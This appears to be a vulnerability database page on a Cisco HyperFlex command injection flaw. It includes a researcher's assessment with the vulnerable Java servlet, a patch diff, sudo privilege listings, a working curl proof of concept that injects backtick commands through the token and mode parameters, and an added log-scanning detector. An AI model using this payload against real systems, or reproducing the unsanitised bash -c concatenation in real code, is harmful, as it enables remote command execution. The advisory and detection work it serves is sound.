CVSS2: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.975 High
Percentile: 100.0%

Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Recent assessments:
wvu-r7 at May 18, 2021 12:18am UTC reported:
Attacker value is a little lower because I was able to test only the installer.
Command injection in the /storfs-asup endpoint’s token and mode parameters.
--- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500
+++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500
@@ -69,17 +69,6 @@
</servlet-mapping>
<servlet>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>
- <load-on-startup>1</load-on-startup>
- </servlet>
-
- <servlet-mapping>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <url-pattern>/storfs-asup/*</url-pattern>
- </servlet-mapping>
-
- <servlet>
<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>
<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>
</servlet>
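Review bot: removing the `Springpath Storfs ASUP` `<servlet>` and its `/storfs-asup/*` `<servlet-mapping>` only unmaps the endpoint in web.xml; nothing in this hunk shows that `com.storvisor.sysmgmt.service.StorfsAsup` itself is removed from the webapp. Suggest deleting the class in the same change, or confirming that no annotation or other mapping still reaches it, and stating in the change description that the servlet was dropped rather than given input validation.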
protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String action = request.getParameter("action");
    if (action == null) {
        String msg = "Action for the servlet need be specified.";
        writeErrorResponse(response, msg);
        return;
    }
    try {
        // token and mode come straight from the request and are appended unmodified
        String token = request.getParameter("token");
        StringBuilder cmd = new StringBuilder();
        cmd.append("exec /bin/storfs-asup ");
        cmd.append(token);
        String mode = request.getParameter("mode");
        cmd.append(" ");
        cmd.append(mode);
        cmd.append(" > /dev/null");
        logger.info("storfs-asup cmd to run : " + cmd);
        // the concatenated string is handed to bash -c, so the shell interprets it
        ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
        logger.info("Starting the storfs-asup now: ");
        long startTime = System.currentTimeMillis();
        Process p = pb.start();
        InputStream errStream = p.getErrorStream();
        String errMsg = FileUtils.readToString(errStream);
        int exitCode = p.waitFor();
        long timeTaken = System.currentTimeMillis() - startTime;
        logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg);
        errStream.close();
        OutputStream outStream = p.getOutputStream();
        outStream.flush();
        outStream.close();
        if (exitCode != 0)
            throw new Exception(errMsg);
    } catch (IOException ex) {
        logger.error("Failed to generate asup: " + ex);
    } catch (Exception ie) {
        logger.error("Failed to run the /bin/storfs-asup command.");
    } finally {
        logger.info("Done executing asup command. ");
    }
}
tomcat7@HyperFlex-Installer-4:~$ sudo -l
Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:
!lecture, tty_tickets, !fqdn
User tomcat7 may run the following commands on HyperFlex-Installer-4:
(ALL) NOPASSWD: /opt/springpath/storfs-support/support.py
(ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh
(ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh
tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help
Usage: support.py [options]
Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET
Target directory where the support bundle should go
(XXX: This could be a remote host(dir), ex:
hostname:/foo). Optional. Default = /tmp
-i INSTALLDIR, --installdir=INSTALLDIR
Install directory for storfs. Optional.
-k ZKDIR, --zkdir=ZKDIR
zookeeper directory for storfs. Optional
-l LOGDIR, --logdir=LOGDIR
log directory for storfs. Optional
--asupdir=ASUPDIR asup directory for storfs. Optional
-c COREDIR, --coredir=COREDIR
core directory for storfs. Optional
-m MANIFESTDIR, --manifestdir=MANIFESTDIR
Manifest directory for storfs support. All files with
.mfx extension in this directory will be processed.
Optional
--list List the manifests. Optional
-f MANIFESTFILES, --manifest-file=MANIFESTFILES
Manifest file to use for generating support. Multiple
manifest files can be specified. Manifests files are
required to have .mfx suffix. Optional (Cannot be with
-m option)
-e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR
log directory for storfs binary files. Optional
--hypervdir=HYPERVDIR
log directory for hyperv binary files. Optional
-o TOOLSDIR, --toolsdir=TOOLSDIR
Path for storfs tools. Optional
-r RUNTIMEDIR, --runtimedir=RUNTIMEDIR
Path for runtime dir (which contains
storfs_running_process.pid files). Optional
-b BUILDTYPE, --buildtype=BUILDTYPE
Build type that was running. Optional. Default = debug
-a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES
any additional files/directories (not in manifest)
that should be added to the support bundle. Optional.
--dry-run Process manifests to make sure that there are no
errors
tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx
/opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx
/opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx
/opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx
/opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx
/opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx
/opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx
/opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx
/opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx
tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx
# Springpath manifest file. Contains just basic logs.
# Simplified from springpath-mgmt.mfx
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/var/jail/var/log/springpath"]
["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/etc/iptables_node_cluster.rules"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "iptables --list -n -v"]
["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "bom-check.sh"]
["exec", "TIMEOUT=120", "IGNORE_ERROR", "mstcli cluster diag"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli cluster info"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli appliance list"]
["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli datastore list"]
tomcat7@HyperFlex-Installer-4:~$
wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
* Trying 192.168.123.133...
* TCP_NODELAY set
* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
> POST /storfs-asup HTTP/1.1
> Host: 192.168.123.133
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Length: 28
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 28 out of 28 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Tue, 18 May 2021 00:54:26 GMT
< Content-Length: 0
< Connection: keep-alive
< Front-End-Https: on
<
* Connection #0 to host 192.168.123.133 left intact
* Closing connection 0
wvu@kharak:~$
==> /var/log/nginx/access.log <==
192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1"
==> /var/log/springpath/stBootstrapGuiBackend.log <==
2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null
2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.
==> /var/log/tomcat7/catalina.out <==
2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null
2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:
2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory
2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.
2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.
==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==
127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -
Assessed Attacker Value: 4
Assessed Attacker Value: 5
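
A detection check for the log evidence in the assessment above, as an added example that is not part of the original assessment or of Cisco's code: the servlet logs the full command line before running it, so scanning the `storfs-asup cmd to run` entries for arguments that are not plain identifiers surfaces injection attempts. The allow-list of characters and the two constructed sample lines are assumptions; the page does not show what legitimate `token` and `mode` values look like.

```python
import re

MARKER = "storfs-asup cmd to run : exec /bin/storfs-asup "
SUFFIX = " > /dev/null"
# Assumption: legitimate token and mode values are plain identifiers.
SAFE_ARG = re.compile(r"[A-Za-z0-9_.:=/-]+")


def suspicious_asup_commands(lines):
    """Return (timestamp, logged_args, reasons) for each suspicious entry."""
    findings = []
    for line in lines:
        line = line.rstrip("\r\n")
        pos = line.find(MARKER)
        if pos < 0:
            continue
        timestamp = line.split(" ", 1)[0]
        rest = line[pos + len(MARKER):]
        reasons = []
        if rest.endswith(SUFFIX):
            args = rest[: -len(SUFFIX)]
        else:
            # The servlet always appends the redirect, so a missing suffix
            # means the logged value spilled onto another line.
            args = rest
            reasons.append("entry truncated, possible embedded newline")
        words = args.split(" ")
        if len(words) != 2:
            reasons.append(f"expected token and mode, got {len(words)} words")
        for word in words:
            if not SAFE_ARG.fullmatch(word):
                reasons.append(f"argument outside allow-list: {word!r}")
        if reasons:
            findings.append((timestamp, args, reasons))
    return findings


# First line is from the log excerpt above; the other two are constructed.
SAMPLE_LOG = [
    "2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null",
    "2021-05-18-01:02:03.000 [tomcat-http-3] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup abc123 full > /dev/null",
    "2021-05-18-01:02:04.000 [tomcat-http-3] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup abc123 full;id > /dev/null",
]

if __name__ == "__main__":
    for ts, args, reasons in suspicious_asup_commands(SAMPLE_LOG):
        print(ts, repr(args), "; ".join(reasons))
```

The same function works on the `catalina.out` entries, since it keys on the message text rather than the logger prefix.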